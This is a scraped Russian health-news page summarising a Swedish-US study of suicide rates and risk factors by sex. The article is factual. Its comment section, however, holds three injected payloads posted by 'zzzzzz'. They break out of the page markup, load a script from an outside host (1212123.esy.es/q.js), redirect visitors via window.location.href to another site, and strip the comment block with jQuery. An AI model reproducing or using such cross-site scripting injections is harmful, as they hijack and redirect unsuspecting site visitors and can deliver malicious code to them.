Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  У вашего мужа в 3 раза бо...  >>  У вашего мужа в 3 раза больше шансов совершить самоубийство! А какой шанс у вас?
 
Обратная связь
 

У вашего мужа в 3 раза больше шансов совершить самоубийство! А какой шанс у вас?

Размер шрифта
22 июля 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

В совместном исследовании Лундского (Швеция) и Стэнфордского (США) университетов было выяснено, что частота самоубийств среди мужчин в три раза превышает таковую у женщин.

У вашего мужа в 3 раза больше шансов совершить самоубийство! А какой шанс у вас?

Ученые анализировали данные из национального регистра Швеции, а это ни много ни мало – семь миллионов человек. Из них почти девять тысяч человек совершили суицид в промежутке с 2001 по 2008 год.

Для сильной половины человечества дополнительными факторами риска самоубийства являются молодой возраст и низкий уровень образования, а для дам самым отягчающим обстоятельством стали патологии в психической сфере. Среди социальных факторов также выявились гендерные различия: одиночество чаще толкало к суициду мужчин, а безработица – женщин.

Ученые провели колоссальную работу, оценивая вклад самых различных факторов (в том числе – разнообразных заболеваний), что позволило им определить самые важные.

«Для снижения частоты самоубийств в обществе необходим междисциплинарный подход, потому что зачастую человек подвержен воздействию сразу нескольких предрасполагающих к суициду факторов: скажем, это может быть депрессия, дополняемая соматическим заболеванием (например, бронхиальной астмой) и неудовлетворительным социальным статусом», – рассказывает профессор Ян Санквист, ведущий научный сотрудник и координатор исследования.

Почти 30% женщин, совершивших самоубийство, посещали врача за три недели до трагического исхода. Среди мужчин этот показатель приблизился к 22%.

Если же рассматривать более продолжительный промежуток времени (13 недель), то выясняется, что за врачебной помощью обращался куда больший процент погибших (57,1% среди женщин и 44,9% среди мужчин).

«Эти данные однозначно свидетельствуют о том, что огромная доля самоубийц контактирует с врачом перед тем, как уйти из жизни», – говорит Санквист. «Данный факт имеет важное клиническое значение для медицинских работников как амбулаторного, так и стационарного профиля. Никогда нельзя забывать, что помимо врачебной помощи доктор может и должен оказывать психологическую, а при необходимости – привлекать социальные службы».

Посчитайте свои риски совершить самоубийство

Депрессия увеличивает риск суицида в 32 раза, тревога – в 15, хроническая обструктивная болезнь легких – в 3, бронхиальная астма – в 2,25, инсульт – в 1,67, рак – в 1,72. У людей с низким уровнем социальных контактов (и у разведенных) риск повышен в 2,25 раз.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:11

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:30

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:10

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Почему магазины могут обмануть людей, но не обезьян?   Суицид научились распознавать по анализу крови   Хотите заболеть шизофренией – попробуйте свинец! Свинец вызывает шизофрению   Московский музей «Живые системы» приглашает всех  
19 июля 2013У вашего мужа в 3 раза больше шансов совершить самоубийство! А какой шанс у вас? 22 июля 2013Хотите заболеть шизофренией – попробуйте свинец! Свинец вызывает шизофрению
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
Грусть или смертельная болезнь
Астма! Когда бежать к врачу?
Как сделать ванную комнату безопасной

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.